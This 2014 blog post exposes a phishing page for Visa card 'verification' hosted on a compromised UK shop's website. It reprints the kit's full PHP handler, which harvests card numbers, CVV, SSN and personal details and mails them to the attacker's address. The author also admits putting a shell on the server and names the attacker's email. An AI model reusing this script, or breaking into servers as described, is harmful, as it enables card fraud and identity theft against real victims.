Pages

Monday, November 3, 2014

Phishing - bristolbathroomstore.co.uk - Exposed

Today i just checked my spam mail and saw this mail 



It say's that my card has been suspended and an error deleted all information !! so i clicked the link and moved to this page


It want all security info from me including card number and pin .
I entered some trash info and submited it , then the script "Perfect.php" came in action and moved me to visa website . So but lets take a look at the url :

hxxp://www.bristolbathroomstore.co.uk/uploads/news/%20vbv.USA/your%20account/index.html

also visa move to the "bristol bathroom store" website LOL


also i put a shell on it just to look at the file "Perfect.php"


<?php
$ip = getenv("REMOTE_ADDR");
$J7 = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=$ip");
$CNCD = $J7->geoplugin_countryCode ; // Country
$STCD = $J7->geoplugin_regionCode ; //  State
$hostname = gethostbyaddr($ip);
$message .= "-----------------[ReZuLt]-------------------\n";
$message .= "First name                     : ".$_POST['nom']."\n";
$message .= "Last name                  : ".$_POST['nom0']."\n";
$message .= "Adress Line 1 : ".$_POST['address1']."\n";
$message .= "Adress Line 2 : ".$_POST['address2']."\n";
$message .= "Town/City : ".$_POST['city']."\n";
$message .= "Pastcode : ".$_POST['zip']."\n";
$message .= "Date dnaissance   : ".$_POST['l_civil0']."/".$_POST['l_civil1']."/".$_POST['l_civil2']."\n";
$message .= "Non d j f      : ".$_POST['adresse']."\n";
$message .= "Social Security Number : ".$_POST['ssn1']."/".$_POST['ssn2']."/".$_POST['ssn3']."\n";
$message .= "Type de carte  : ".$_POST['l_civil3']."\n";include 'Perfect/visa.css';
$message .= "numero carte   : ".$_POST['ccnum']."\n";
$message .= "Date d'expir   : ".$_POST['mois']."/".$_POST['annee']."\n";
$message .= "cvv2           :".$_POST['cvv2']."\n";
$message .= "---------------------------------------------\n";
$message .= "IP Address : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$timedate = $_POST['historys'];
$rnessage  = "$message\n";
$message .= "-------------------+ Created in 2014 [ Dj0ui ] +--------------------\n";
$send="mamine.boujneh@live.fr"; // 
$subject = "CC VBV ReZulT | Fallega |  ~>| $CNCD | $STCD | Fr0m $ip";
$headers = "From:Fallega~<mamine.boujneh@live.fr>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$rnessage,$headers);
mail("mamine.boujneh@live.fr",$subject,$rnessage,$headers);
header("Location:  https://usa.visa.com/personal/security/vbv/index.html");
?>

all the data collected go to his mail address , also if u enter in on facebook give you interesting information .



Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)